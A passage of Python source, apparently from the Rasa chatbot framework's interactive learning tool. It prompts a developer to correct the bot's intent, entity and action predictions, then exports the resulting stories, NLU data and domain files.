question = questionary.text(
message="Please type the intent name:",
validate=io_utils.not_empty_validator("Please enter an intent name"),
)
return await _ask_questions(question, sender_id, endpoint)
async def _request_free_text_action(sender_id: Text, endpoint: EndpointConfig) -> Text:
question = questionary.text(
message="Please type the action name:",
validate=io_utils.not_empty_validator("Please enter an action name"),
)
return await _ask_questions(question, sender_id, endpoint)
async def _request_free_text_utterance(
sender_id: Text, endpoint: EndpointConfig, action: Text
) -> Text:
question = questionary.text(
message=(
"Please type the message for your new utterance "
"template '{}':".format(action)
),
validate=io_utils.not_empty_validator("Please enter a template message"),
)
return await _ask_questions(question, sender_id, endpoint)
async def _request_selection_from_intents(
intents: List[Dict[Text, Text]], sender_id: Text, endpoint: EndpointConfig
) -> Text:
question = questionary.select("What intent is it?", choices=intents)
return await _ask_questions(question, sender_id, endpoint)
async def _request_fork_point_from_list(
forks: List[Dict[Text, Text]], sender_id: Text, endpoint: EndpointConfig
) -> Text:
question = questionary.select(
"Before which user message do you want to fork?", choices=forks
)
return await _ask_questions(question, sender_id, endpoint)
async def _request_fork_from_user(
sender_id, endpoint
) -> Optional[List[Dict[Text, Any]]]:
"""Take in a conversation and ask at which point to fork the conversation.
Returns the list of events that should be kept. Forking means, the
conversation will be reset and continued from this previous point."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.AFTER_RESTART)
choices = []
for i, e in enumerate(tracker.get("events", [])):
if e.get("event") == UserUttered.type_name:
choices.append({"name": e.get("text"), "value": i})
fork_idx = await _request_fork_point_from_list(
list(reversed(choices)), sender_id, endpoint
)
if fork_idx is not None:
return tracker.get("events", [])[: int(fork_idx)]
else:
return None
async def _request_intent_from_user(
latest_message, intents, sender_id, endpoint
) -> Dict[Text, Any]:
"""Take in latest message and ask which intent it should have been.
Returns the intent dict that has been selected by the user."""
predictions = latest_message.get("parse_data", {}).get("intent_ranking", [])
predicted_intents = {p["name"] for p in predictions}
for i in intents:
if i not in predicted_intents:
predictions.append({"name": i, "confidence": 0.0})
# convert intents to ui list and add <other> as a free text alternative
choices = [
{"name": "<create_new_intent>", "value": OTHER_INTENT}
] + _selection_choices_from_intent_prediction(predictions)
intent_name = await _request_selection_from_intents(choices, sender_id, endpoint)
if intent_name == OTHER_INTENT:
intent_name = await _request_free_text_intent(sender_id, endpoint)
selected_intent = {"name": intent_name, "confidence": 1.0}
else:
# returns the selected intent with the original probability value
selected_intent = next(
(x for x in predictions if x["name"] == intent_name), {"name": None}
)
return selected_intent
async def _print_history(sender_id: Text, endpoint: EndpointConfig) -> None:
"""Print information about the conversation for the user."""
tracker_dump = await retrieve_tracker(
endpoint, sender_id, EventVerbosity.AFTER_RESTART
)
events = tracker_dump.get("events", [])
table = _chat_history_table(events)
slot_strs = _slot_history(tracker_dump)
print("------")
print("Chat History\n")
print(table)
if slot_strs:
print("\n")
print("Current slots: \n\t{}\n".format(", ".join(slot_strs)))
print("------")
def _chat_history_table(events: List[Dict[Text, Any]]) -> Text:
"""Create a table containing bot and user messages.
Also includes additional information, like any events and
prediction probabilities."""
def wrap(txt: Text, max_width: int) -> Text:
return "\n".join(textwrap.wrap(txt, max_width, replace_whitespace=False))
def colored(txt: Text, color: Text) -> Text:
return "{" + color + "}" + txt + "{/" + color + "}"
def format_user_msg(user_event: UserUttered, max_width: int) -> Text:
intent = user_event.intent or {}
intent_name = intent.get("name", "")
_confidence = intent.get("confidence", 1.0)
_md = _as_md_message(user_event.parse_data)
_lines = [
colored(wrap(_md, max_width), "hired"),
f"intent: {intent_name} {_confidence:03.2f}",
]
return "\n".join(_lines)
def bot_width(_table: AsciiTable) -> int:
return _table.column_max_width(1)
def user_width(_table: AsciiTable) -> int:
return _table.column_max_width(3)
def add_bot_cell(data, cell):
data.append([len(data), Color(cell), "", ""])
def add_user_cell(data, cell):
data.append([len(data), "", "", Color(cell)])
# prints the historical interactions between the bot and the user,
# to help with correctly identifying the action
table_data = [
[
"# ",
Color(colored("Bot ", "autoblue")),
" ",
Color(colored("You ", "hired")),
]
]
table = SingleTable(table_data, "Chat History")
bot_column = []
tracker = DialogueStateTracker.from_dict("any", events)
applied_events = tracker.applied_events()
for idx, event in enumerate(applied_events):
if isinstance(event, ActionExecuted):
bot_column.append(colored(event.action_name, "autocyan"))
if event.confidence is not None:
bot_column[-1] += colored(f" {event.confidence:03.2f}", "autowhite")
elif isinstance(event, UserUttered):
if bot_column:
text = "\n".join(bot_column)
add_bot_cell(table_data, text)
bot_column = []
msg = format_user_msg(event, user_width(table))
add_user_cell(table_data, msg)
elif isinstance(event, BotUttered):
wrapped = wrap(format_bot_output(event), bot_width(table))
bot_column.append(colored(wrapped, "autoblue"))
else:
if event.as_story_string():
bot_column.append(wrap(event.as_story_string(), bot_width(table)))
if bot_column:
text = "\n".join(bot_column)
add_bot_cell(table_data, text)
table.inner_heading_row_border = False
table.inner_row_border = True
table.inner_column_border = False
table.outer_border = False
table.justify_columns = {0: "left", 1: "left", 2: "center", 3: "right"}
return table.table
def _slot_history(tracker_dump: Dict[Text, Any]) -> List[Text]:
"""Create an array of slot representations to be displayed."""
slot_strs = []
for k, s in tracker_dump.get("slots", {}).items():
colored_value = cliutils.wrap_with_color(
str(s), color=rasa.cli.utils.bcolors.WARNING
)
slot_strs.append(f"{k}: {colored_value}")
return slot_strs
async def _write_data_to_file(sender_id: Text, endpoint: EndpointConfig):
"""Write stories and nlu data to file."""
story_path, nlu_path, domain_path = _request_export_info()
tracker = await retrieve_tracker(endpoint, sender_id)
events = tracker.get("events", [])
serialised_domain = await retrieve_domain(endpoint)
domain = Domain.from_dict(serialised_domain)
await _write_stories_to_file(story_path, events, domain)
await _write_nlu_to_file(nlu_path, events)
await _write_domain_to_file(domain_path, events, domain)
logger.info("Successfully wrote stories and NLU data")
async def _ask_if_quit(sender_id: Text, endpoint: EndpointConfig) -> bool:
"""Display the exit menu.
Return `True` if the previous question should be retried."""
answer = questionary.select(
message="Do you want to stop?",
choices=[
Choice("Continue", "continue"),
Choice("Undo Last", "undo"),
Choice("Fork", "fork"),
Choice("Start Fresh", "restart"),
Choice("Export & Quit", "quit"),
],
).ask()
if not answer or answer == "quit":
# this is also the default answer if the user presses Ctrl-C
await _write_data_to_file(sender_id, endpoint)
raise Abort()
elif answer == "continue":
# in this case we will just return, and the original
# question will get asked again
return True
elif answer == "undo":
raise UndoLastStep()
elif answer == "fork":
raise ForkTracker()
elif answer == "restart":
raise RestartConversation()
async def _request_action_from_user(
predictions: List[Dict[Text, Any]], sender_id: Text, endpoint: EndpointConfig
) -> Tuple[Text, bool]:
"""Ask the user to correct an action prediction."""
await _print_history(sender_id, endpoint)
choices = [
{
"name": "{:03.2f} {:40}".format(a.get("score"), a.get("action")),
"value": a.get("action"),
}
for a in predictions
]
tracker = await retrieve_tracker(endpoint, sender_id)
events = tracker.get("events", [])
session_actions_all = [a["name"] for a in _collect_actions(events)]
session_actions_unique = list(set(session_actions_all))
old_actions = [action["value"] for action in choices]
new_actions = [
{"name": action, "value": OTHER_ACTION + action}
for action in session_actions_unique
if action not in old_actions
]
choices = (
[{"name": "<create new action>", "value": NEW_ACTION}] + new_actions + choices
)
question = questionary.select("What is the next action of the bot?", choices)
action_name = await _ask_questions(question, sender_id, endpoint)
is_new_action = action_name == NEW_ACTION
if is_new_action:
# create new action
action_name = await _request_free_text_action(sender_id, endpoint)
if action_name.startswith(UTTER_PREFIX):
utter_message = await _request_free_text_utterance(
sender_id, endpoint, action_name
)
NEW_TEMPLATES[action_name] = {utter_message: ""}
elif action_name[:32] == OTHER_ACTION:
# action was newly created in the session, but not this turn
is_new_action = True
action_name = action_name[32:]
print(f"Thanks! The bot will now run {action_name}.\n")
return action_name, is_new_action
def _request_export_info() -> Tuple[Text, Text, Text]:
"""Request file path and export stories & nlu data to that path"""
# export training data and quit
questions = questionary.form(
export_stories=questionary.text(
message="Export stories to (if file exists, this "
"will append the stories)",
default=PATHS["stories"],
validate=io_utils.file_type_validator(
[".md"],
"Please provide a valid export path for the stories, e.g. 'stories.md'.",
),
),
export_nlu=questionary.text(
message="Export NLU data to (if file exists, this will "
"merge learned data with previous training examples)",
default=PATHS["nlu"],
validate=io_utils.file_type_validator(
[".md", ".json"],
"Please provide a valid export path for the NLU data, e.g. 'nlu.md'.",
),
),
export_domain=questionary.text(
message="Export domain file to (if file exists, this "
"will be overwritten)",
default=PATHS["domain"],
validate=io_utils.file_type_validator(
[".yml", ".yaml"],
"Please provide a valid export path for the domain file, e.g. 'domain.yml'.",
),
),
)
answers = questions.ask()
if not answers:
raise Abort()
return (answers["export_stories"], answers["export_nlu"], answers["export_domain"])
def _split_conversation_at_restarts(
events: List[Dict[Text, Any]]
) -> List[List[Dict[Text, Any]]]:
"""Split a conversation at restart events.
Returns an array of event lists, without the restart events."""
sub_conversations = []
current = []
for e in events:
if e.get("event") == "restart":
if current:
sub_conversations.append(current)
current = []
else:
current.append(e)
if current:
sub_conversations.append(current)
return sub_conversations
def _collect_messages(events: List[Dict[Text, Any]]) -> List[Message]:
"""Collect the message text and parsed data from the UserMessage events
into a list"""
from rasa.nlu.extractors.duckling_http_extractor import DucklingHTTPExtractor
from rasa.nlu.extractors.mitie_entity_extractor import MitieEntityExtractor
from rasa.nlu.extractors.spacy_entity_extractor import SpacyEntityExtractor
msgs = []
for event in events:
if event.get("event") == UserUttered.type_name:
data = event.get("parse_data", {})
for entity in data.get("entities", []):
excluded_extractors = [
DucklingHTTPExtractor.__name__,
SpacyEntityExtractor.__name__,
MitieEntityExtractor.__name__,
]
logger.debug(
"Exclude entity marking of following extractors"
" {} when writing nlu data "
"to file.".format(excluded_extractors)
)
if entity.get("extractor") in excluded_extractors:
data["entities"].remove(entity)
msg = Message.build(data["text"], data["intent"]["name"], data["entities"])
msgs.append(msg)
elif event.get("event") == UserUtteranceReverted.type_name and msgs:
msgs.pop() # user corrected the nlu, remove incorrect example
return msgs
def _collect_actions(events: List[Dict[Text, Any]]) -> List[Dict[Text, Any]]:
"""Collect all the `ActionExecuted` events into a list."""
return [evt for evt in events if evt.get("event") == ActionExecuted.type_name]
async def _write_stories_to_file(
export_story_path: Text, events: List[Dict[Text, Any]], domain: Domain
) -> None:
"""Write the conversation of the sender_id to the file paths."""
sub_conversations = _split_conversation_at_restarts(events)
io_utils.create_path(export_story_path)
if os.path.exists(export_story_path):
append_write = "a" # append if already exists
else:
append_write = "w" # make a new file if not
with open(export_story_path, append_write, encoding=io_utils.DEFAULT_ENCODING) as f:
i = 1
for conversation in sub_conversations:
parsed_events = rasa.core.events.deserialise_events(conversation)
tracker = DialogueStateTracker.from_events(
f"interactive_story_{i}", evts=parsed_events, slots=domain.slots
)
if any(
isinstance(event, UserUttered) for event in tracker.applied_events()
):
i += 1
f.write("\n" + tracker.export_stories(SAVE_IN_E2E))
def _filter_messages(msgs: List[Message]) -> List[Message]:
"""Filter messages removing those that start with INTENT_MESSAGE_PREFIX"""
filtered_messages = []
for msg in msgs:
if not msg.text.startswith(INTENT_MESSAGE_PREFIX):
filtered_messages.append(msg)
return filtered_messages
async def _write_nlu_to_file(
export_nlu_path: Text, events: List[Dict[Text, Any]]
) -> None:
"""Write the nlu data of the sender_id to the file paths."""
from rasa.nlu.training_data import TrainingData
msgs = _collect_messages(events)
msgs = _filter_messages(msgs)
# noinspection PyBroadException
try:
previous_examples = loading.load_data(export_nlu_path)
except Exception as e:
logger.debug(
"An exception occurred while trying to load the NLU data. {}".format(str(e))
)
# No previous file exists, use empty training data as replacement.
previous_examples = TrainingData()
nlu_data = previous_examples.merge(TrainingData(msgs))
# need to guess the format of the file before opening it to avoid a read
# in a write
nlu_format = _get_nlu_target_format(export_nlu_path)
if nlu_format == MARKDOWN:
stringified_training_data = nlu_data.nlu_as_markdown()
else:
stringified_training_data = nlu_data.nlu_as_json()
io_utils.write_text_file(stringified_training_data, export_nlu_path)
def _get_nlu_target_format(export_path: Text) -> Text:
guessed_format = loading.guess_format(export_path)
if guessed_format not in {MARKDOWN, RASA}:
if export_path.endswith(".json"):
guessed_format = RASA
else:
guessed_format = MARKDOWN
return guessed_format
def _entities_from_messages(messages: List[Message]) -> List[Text]:
"""Return all entities that occur in at least one of the messages."""
return list({e["entity"] for m in messages for e in m.data.get("entities", [])})
def _intents_from_messages(messages: List[Message]) -> Set[Text]:
"""Return all intents that occur in at least one of the messages."""
# set of distinct intents
distinct_intents = {m.data["intent"] for m in messages if "intent" in m.data}
return distinct_intents
async def _write_domain_to_file(
domain_path: Text, events: List[Dict[Text, Any]], old_domain: Domain
) -> None:
"""Write an updated domain file to the file path."""
io_utils.create_path(domain_path)
messages = _collect_messages(events)
actions = _collect_actions(events)
templates = NEW_TEMPLATES # type: Dict[Text, List[Dict[Text, Any]]]
# TODO for now there is no way to distinguish between action and form
collected_actions = list(
{e["name"] for e in actions if e["name"] not in default_action_names()}
)
new_domain = Domain(
intents=_intents_from_messages(messages),
entities=_entities_from_messages(messages),
slots=[],
templates=templates,
action_names=collected_actions,
form_names=[],
)
old_domain.merge(new_domain).persist_clean(domain_path)
async def _predict_till_next_listen(
endpoint: EndpointConfig,
sender_id: Text,
sender_ids: List[Text],
plot_file: Optional[Text],
) -> None:
"""Predict and validate actions until we need to wait for a user message."""
listen = False
while not listen:
result = await request_prediction(endpoint, sender_id)
predictions = result.get("scores")
probabilities = [prediction["score"] for prediction in predictions]
pred_out = int(np.argmax(probabilities))
action_name = predictions[pred_out].get("action")
policy = result.get("policy")
confidence = result.get("confidence")
await _print_history(sender_id, endpoint)
await _plot_trackers(
sender_ids, plot_file, endpoint, unconfirmed=[ActionExecuted(action_name)]
)
listen = await _validate_action(
action_name, policy, confidence, predictions, endpoint, sender_id
)
await _plot_trackers(sender_ids, plot_file, endpoint)
tracker_dump = await retrieve_tracker(
endpoint, sender_id, EventVerbosity.AFTER_RESTART
)
events = tracker_dump.get("events", [])
if len(events) >= 2:
last_event = events[-2] # last event before action_listen
# if bot message includes buttons the user will get a list choice to reply
# the list choice is displayed in place of action listen
if last_event.get("event") == BotUttered.type_name and last_event["data"].get(
"buttons", None
):
response = _get_button_choice(last_event)
if response != cliutils.FREE_TEXT_INPUT_PROMPT:
await send_message(endpoint, sender_id, response)
def _get_button_choice(last_event: Dict[Text, Any]) -> Text:
data = last_event["data"]
message = last_event.get("text", "")
choices = cliutils.button_choices_from_message_data(
data, allow_free_text_input=True
)
question = questionary.select(message, choices)
response = cliutils.payload_from_button_question(question)
return response
async def _correct_wrong_nlu(
corrected_nlu: Dict[Text, Any],
events: List[Dict[Text, Any]],
endpoint: EndpointConfig,
sender_id: Text,
) -> None:
"""A wrong NLU prediction got corrected, update core's tracker."""
revert_latest_user_utterance = UserUtteranceReverted().as_dict()
# `UserUtteranceReverted` also removes the `ACTION_LISTEN` event before, hence we
# have to replay it.
listen_for_next_message = ActionExecuted(ACTION_LISTEN_NAME).as_dict()
corrected_message = latest_user_message(events)
if corrected_message is None:
raise Exception("Failed to correct NLU data. User message not found.")
corrected_message["parse_data"] = corrected_nlu
await send_event(
endpoint,
sender_id,
[revert_latest_user_utterance, listen_for_next_message, corrected_message],
)
async def _correct_wrong_action(
corrected_action: Text,
endpoint: EndpointConfig,
sender_id: Text,
is_new_action: bool = False,
) -> None:
"""A wrong action prediction got corrected, update core's tracker."""
await send_action(
endpoint, sender_id, corrected_action, is_new_action=is_new_action
)
def _form_is_rejected(action_name: Text, tracker: Dict[Text, Any]) -> bool:
"""Check if the form got rejected with the most recent action name."""
return (
tracker.get("active_form", {}).get("name")
and action_name != tracker["active_form"]["name"]
and action_name != ACTION_LISTEN_NAME
)
def _form_is_restored(action_name: Text, tracker: Dict[Text, Any]) -> bool:
"""Check whether the form is called again after it was rejected."""
return (
tracker.get("active_form", {}).get("rejected")
and tracker.get("latest_action_name") == ACTION_LISTEN_NAME
and action_name == tracker.get("active_form", {}).get("name")
)
async def _confirm_form_validation(action_name, tracker, endpoint, sender_id) -> None:
"""Ask a user whether an input for a form should be validated.
Previous to this call, the active form was chosen after it was rejected."""
requested_slot = tracker.get("slots", {}).get(REQUESTED_SLOT)
validation_questions = questionary.confirm(
"Should '{}' validate user input to fill "
"the slot '{}'?".format(action_name, requested_slot)
)
validate_input = await _ask_questions(validation_questions, sender_id, endpoint)
if not validate_input:
# notify form action to skip validation
await send_event(
endpoint, sender_id, {"event": "form_validation", "validate": False}
)
elif not tracker.get("active_form", {}).get("validate"):
# handle contradiction with learned behaviour
warning_question = questionary.confirm(
"ERROR: FormPolicy predicted no form validation "
"based on previous training stories. "
"Make sure to remove contradictory stories "
"from training data. "
"Otherwise predicting no form validation "
"will not work as expected."
)
await _ask_questions(warning_question, sender_id, endpoint)
# notify form action to validate an input
await send_event(
endpoint, sender_id, {"event": "form_validation", "validate": True}
)
async def _validate_action(
action_name: Text,
policy: Text,
confidence: float,
predictions: List[Dict[Text, Any]],
endpoint: EndpointConfig,
sender_id: Text,
) -> bool:
"""Query the user to validate if an action prediction is correct.
Returns `True` if the prediction is correct, `False` otherwise."""
question = questionary.confirm(f"The bot wants to run '{action_name}', correct?")
is_correct = await _ask_questions(question, sender_id, endpoint)
if not is_correct:
action_name, is_new_action = await _request_action_from_user(
predictions, sender_id, endpoint
)
else:
is_new_action = False
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.AFTER_RESTART)
if _form_is_rejected(action_name, tracker):
# notify the tracker that form was rejected
await send_event(
endpoint,
sender_id,
{
"event": "action_execution_rejected",
"name": tracker["active_form"]["name"],
},
)
elif _form_is_restored(action_name, tracker):
await _confirm_form_validation(action_name, tracker, endpoint, sender_id)
if not is_correct:
await _correct_wrong_action(
action_name, endpoint, sender_id, is_new_action=is_new_action
)
else:
await send_action(endpoint, sender_id, action_name, policy, confidence)
return action_name == ACTION_LISTEN_NAME
def _as_md_message(parse_data: Dict[Text, Any]) -> Text:
"""Display the parse data of a message in markdown format."""
from rasa.nlu.training_data.formats import MarkdownWriter
if parse_data.get("text", "").startswith(INTENT_MESSAGE_PREFIX):
return parse_data["text"]
if not parse_data.get("entities"):
parse_data["entities"] = []
return MarkdownWriter.generate_message_md(parse_data)
def _validate_user_regex(latest_message: Dict[Text, Any], intents: List[Text]) -> bool:
"""Validate if a users message input is correct.
This assumes the user entered an intent directly, e.g. using
`/greet`. Return `True` if the intent is a known one."""
parse_data = latest_message.get("parse_data", {})
intent = parse_data.get("intent", {}).get("name")
if intent in intents:
return True
else:
return False
async def _validate_user_text(
latest_message: Dict[Text, Any], endpoint: EndpointConfig, sender_id: Text
) -> bool:
"""Validate a user message input as free text.
This assumes the user message is a text message (so NOT `/greet`)."""
parse_data = latest_message.get("parse_data", {})
text = _as_md_message(parse_data)
intent = parse_data.get("intent", {}).get("name")
entities = parse_data.get("entities", [])
if entities:
message = (
"Is the intent '{}' correct for '{}' and are "
"all entities labeled correctly?".format(intent, text)
)
else:
message = (
"Your NLU model classified '{}' with intent '{}'"
" and there are no entities, is this correct?".format(text, intent)
)
if intent is None:
print(f"The NLU classification for '{text}' returned '{intent}'")
return False
else:
question = questionary.confirm(message)
return await _ask_questions(question, sender_id, endpoint)
async def _validate_nlu(
intents: List[Text], endpoint: EndpointConfig, sender_id: Text
) -> None:
"""Validate if a user message, either text or intent is correct.
If the prediction of the latest user message is incorrect,
the tracker will be corrected with the correct intent / entities."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.AFTER_RESTART)
latest_message = latest_user_message(tracker.get("events", [])) or {}
if latest_message.get("text", "").startswith( # pytype: disable=attribute-error
INTENT_MESSAGE_PREFIX
):
valid = _validate_user_regex(latest_message, intents)
else:
valid = await _validate_user_text(latest_message, endpoint, sender_id)
if not valid:
corrected_intent = await _request_intent_from_user(
latest_message, intents, sender_id, endpoint
)
# corrected intents have confidence 1.0
corrected_intent["confidence"] = 1.0
events = tracker.get("events", [])
entities = await _correct_entities(latest_message, endpoint, sender_id)
corrected_nlu = {
"intent": corrected_intent,
"entities": entities,
"text": latest_message.get("text"),
}
await _correct_wrong_nlu(corrected_nlu, events, endpoint, sender_id)
async def _correct_entities(
latest_message: Dict[Text, Any], endpoint: EndpointConfig, sender_id: Text
) -> List[Dict[Text, Any]]:
"""Validate the entities of a user message.
Returns the corrected entities"""
from rasa.nlu.training_data.formats import MarkdownReader
parse_original = latest_message.get("parse_data", {})
entity_str = _as_md_message(parse_original)
question = questionary.text(
"Please mark the entities using [value](type) notation", default=entity_str
)
annotation = await _ask_questions(question, sender_id, endpoint)
# noinspection PyProtectedMember
parse_annotated = MarkdownReader().parse_training_example(annotation)
corrected_entities = _merge_annotated_and_original_entities(
parse_annotated, parse_original
)
return corrected_entities
def _merge_annotated_and_original_entities(
parse_annotated: Message, parse_original: Dict[Text, Any]
) -> List[Dict[Text, Any]]:
# overwrite entities which have already been
# annotated in the original annotation to preserve
# additional entity parser information
entities = parse_annotated.get("entities", [])[:]
for i, entity in enumerate(entities):
for original_entity in parse_original.get("entities", []):
if _is_same_entity_annotation(entity, original_entity):
entities[i] = original_entity
break
return entities
def _is_same_entity_annotation(entity, other) -> Any:
return entity["value"] == other["value"] and entity["entity"] == other["entity"]
async def _enter_user_message(sender_id: Text, endpoint: EndpointConfig) -> None:
"""Request a new message from the user."""
question = questionary.text("Your input ->")
message = await _ask_questions(question, sender_id, endpoint, lambda a: not a)
if message == (INTENT_MESSAGE_PREFIX + constants.USER_INTENT_RESTART):
raise RestartConversation()
await send_message(endpoint, sender_id, message)
async def is_listening_for_message(sender_id: Text, endpoint: EndpointConfig) -> bool:
"""Check if the conversation is in need for a user message."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.APPLIED)
for i, e in enumerate(reversed(tracker.get("events", []))):
if e.get("event") == UserUttered.type_name:
return False
elif e.get("event") == ActionExecuted.type_name:
return e.get("name") == ACTION_LISTEN_NAME
return False
async def _undo_latest(sender_id: Text, endpoint: EndpointConfig) -> None:
"""Undo either the latest bot action or user message, whatever is last."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.ALL)
# Get latest `UserUtterance` or `ActionExecuted` event.
last_event_type = None
for i, e in enumerate(reversed(tracker.get("events", []))):
last_event_type = e.get("event")
if last_event_type in {ActionExecuted.type_name, UserUttered.type_name}:
break
elif last_event_type == Restarted.type_name:
break
if last_event_type == ActionExecuted.type_name:
undo_action = ActionReverted().as_dict()
await send_event(endpoint, sender_id, undo_action)
elif last_event_type == UserUttered.type_name:
undo_user_message = UserUtteranceReverted().as_dict()
listen_for_next_message = ActionExecuted(ACTION_LISTEN_NAME).as_dict()
await send_event(
endpoint, sender_id, [undo_user_message, listen_for_next_message]
)
async def _fetch_events(
sender_ids: List[Union[Text, List[Event]]], endpoint: EndpointConfig
) -> List[List[Event]]:
"""Retrieve all event trackers from the endpoint for all sender ids."""
event_sequences = []
for sender_id in sender_ids:
if isinstance(sender_id, str):
tracker = await retrieve_tracker(endpoint, sender_id)
events = tracker.get("events", [])
for conversation in _split_conversation_at_restarts(events):
parsed_events = rasa.core.events.deserialise_events(conversation)
event_sequences.append(parsed_events)
else:
event_sequences.append(sender_id)
return event_sequences
async def _plot_trackers(
sender_ids: List[Union[Text, List[Event]]],
output_file: Optional[Text],
endpoint: EndpointConfig,
unconfirmed: Optional[List[Event]] = None,
):
"""Create a plot of the trackers of the passed sender ids.
This assumes that the last sender id is the conversation we are currently
working on. If there are events that are not part of this active tracker
yet, they can be passed as part of `unconfirmed`. They will be appended
to the currently active conversation."""
if not output_file or not sender_ids:
# if there is no output file provided, we are going to skip plotting
# same happens if there are no sender ids
return None
event_sequences = await _fetch_events(sender_ids, endpoint)
if unconfirmed:
event_sequences[-1].extend(unconfirmed)
graph = await visualize_neighborhood(
event_sequences[-1], event_sequences, output_file=None, max_history=2
)
from networkx.drawing.nx_pydot import write_dot
write_dot(graph, output_file)
def _print_help(skip_visualization: bool) -> None:
"""Print some initial help message for the user."""
if not skip_visualization:
visualization_url = DEFAULT_SERVER_FORMAT.format(
"http", DEFAULT_SERVER_PORT + 1
)
visualization_help = "Visualisation at {}/visualization.html.".format(
visualization_url
)
else:
visualization_help = ""
rasa.cli.utils.print_success(
"Bot loaded. {}\n"
"Type a message and press enter "
"(press 'Ctr-c' to exit). "
"".format(visualization_help)
)
async def record_messages(
endpoint: EndpointConfig,
sender_id: Text = UserMessage.DEFAULT_SENDER_ID,
max_message_limit: Optional[int] = None,
stories: Optional[Text] = None,
skip_visualization: bool = False,
):
"""Read messages from the command line and print bot responses."""
try:
try:
domain = await retrieve_domain(endpoint)
except ClientError:
logger.exception(
"Failed to connect to Rasa Core server at '{}'. "
"Is the server running?".format(endpoint.url)
)
return
intents = [next(iter(i)) for i in (domain.get("intents") or [])]
num_messages = 0
if not skip_visualization:
events_including_current_user_id = await _get_tracker_events_to_plot(
domain, stories, sender_id
)
plot_file = DEFAULT_STORY_GRAPH_FILE
await _plot_trackers(events_including_current_user_id, plot_file, endpoint)
else:
# `None` means that future `_plot_trackers` calls will also skip the
# visualization.
plot_file = None
events_including_current_user_id = []
_print_help(skip_visualization)
while not utils.is_limit_reached(num_messages, max_message_limit):
try:
if await is_listening_for_message(sender_id, endpoint):
await _enter_user_message(sender_id, endpoint)
await _validate_nlu(intents, endpoint, sender_id)
await _predict_till_next_listen(
endpoint, sender_id, events_including_current_user_id, plot_file
)
num_messages += 1
except RestartConversation:
await send_event(endpoint, sender_id, Restarted().as_dict())
await send_event(
endpoint, sender_id, ActionExecuted(ACTION_LISTEN_NAME).as_dict()
)
logger.info("Restarted conversation, starting a new one.")
except UndoLastStep:
await _undo_latest(sender_id, endpoint)
await _print_history(sender_id, endpoint)
except ForkTracker:
await _print_history(sender_id, endpoint)
events_fork = await _request_fork_from_user(sender_id, endpoint)
await send_event(endpoint, sender_id, Restarted().as_dict())
if events_fork:
for evt in events_fork:
await send_event(endpoint, sender_id, evt)
logger.info("Restarted conversation at fork.")
await _print_history(sender_id, endpoint)
await _plot_trackers(
events_including_current_user_id, plot_file, endpoint
)
except Abort:
return
except Exception:
logger.exception("An exception occurred while recording messages.")
raise
async def _get_tracker_events_to_plot(
domain: Dict[Text, Any], stories: Optional[Text], sender_id: Text
) -> List[Union[Text, List[Event]]]:
training_trackers = await _get_training_trackers(stories, domain)
number_of_trackers = len(training_trackers)
if number_of_trackers > MAX_NUMBER_OF_TRAINING_STORIES_FOR_VISUALIZATION:
rasa.cli.utils.print_warning(
f"You have {number_of_trackers} different story paths in "
f"your training data. Visualizing them is very resource "
f"consuming. Hence, the visualization will only show the stories "
f"which you created during interactive learning, but not your "
f"training stories."
)
training_trackers = []
training_data_events = [t.events for t in training_trackers]
events_including_current_user_id = training_data_events + [sender_id]
return events_including_current_user_id
async def _get_training_trackers(
stories: Optional[Text], domain: Dict[str, Any]
) -> List[DialogueStateTracker]:
from rasa.core import training
return await training.load_data(
stories,
Domain.from_dict(domain),
augmentation_factor=0,
use_story_concatenation=False,
)
def _serve_application(app: Sanic, stories, skip_visualization) -> Sanic:
"""Start a core server and attach the interactive learning IO."""
endpoint = EndpointConfig(url=DEFAULT_SERVER_URL)
async def run_interactive_io(running_app: Sanic):
"""Small wrapper to shut down the server once cmd io is done."""
await record_messages(
endpoint=endpoint,
stories=stories,
skip_visualization=skip_visualization,
sender_id=uuid.uuid4().hex,
)
logger.info("Killing Sanic server now.")
running_app.stop() # kill the sanic server
app.add_task(run_interactive_io)
update_sanic_log_level()
app.run(host="0.0.0.0", port=DEFAULT_SERVER_PORT)
return app
def start_visualization(image_path: Text = None) -> None:
"""Add routes to serve the conversation visualization files."""
app = Sanic(__name__)
# noinspection PyUnusedLocal
@app.exception(NotFound)
async def ignore_404s(request, exception):
return response.text("Not found", status=404)
# noinspection PyUnusedLocal
@app.route(VISUALIZATION_TEMPLATE_PATH, methods=["GET"])
def visualisation_html(request):
return response.file(visualization.visualization_html_path())
# noinspection PyUnusedLocal
@app.route("/visualization.dot", methods=["GET"])
def visualisation_png(request):
try:
headers = {"Cache-Control": "no-cache"}
return response.file(os.path.abspath(image_path), headers=headers)
except FileNotFoundError:
return response.text("", 404)
update_sanic_log_level()
app.run(host="0.0.0.0", port=DEFAULT_SERVER_PORT + 1, access_log=False)
# noinspection PyUnusedLocal
async def train_agent_on_start(
args, endpoints, additional_arguments, app, loop
) -> None:
_interpreter = NaturalLanguageInterpreter.create(endpoints.nlu or args.get("nlu"))
model_directory = args.get("out", tempfile.mkdtemp(suffix="_core_model"))
_agent = await train(
args.get("domain"),
args.get("stories"),
model_directory,
_interpreter,
endpoints,
args.get("dump_stories"),
args.get("config")[0],
None,
additional_arguments,
)
app.agent = _agent
async def wait_til_server_is_running(
endpoint, max_retries=30, sleep_between_retries=1
) -> bool:
"""Try to reach the server, retry a couple of times and sleep in between."""
while max_retries:
try:
r = await retrieve_status(endpoint)
logger.info(f"Reached core: {r}")
if not r.get("is_ready"):
# server did not finish loading the agent yet
# in this case, we need to wait till the model trained
# so we might be sleeping for a while...
await asyncio.sleep(sleep_between_retries)
continue
else:
# server is ready to go
return True
except ClientError:
max_retries -= 1
if max_retries:
await asyncio.sleep(sleep_between_retries)
return False
def run_interactive_learning(
stories: Text = None,
skip_visualization: bool = False,
server_args: Dict[Text, Any] = None,
additional_arguments: Dict[Text, Any] = None,
):
"""Start the interactive learning with the model of the agent."""
global SAVE_IN_E2E
server_args = server_args or {}
if server_args.get("nlu_data"):
PATHS["nlu"] = server_args["nlu_data"]
if server_args.get("stories"):
PATHS["stories"] = server_args["stories"]
if server_args.get("domain"):
PATHS["domain"] = server_args["domain"]
SAVE_IN_E2E = server_args["e2e"]
if not skip_visualization:
p = Process(target=start_visualization, args=(DEFAULT_STORY_GRAPH_FILE,))
p.daemon = True
p.start()
else:
p = None
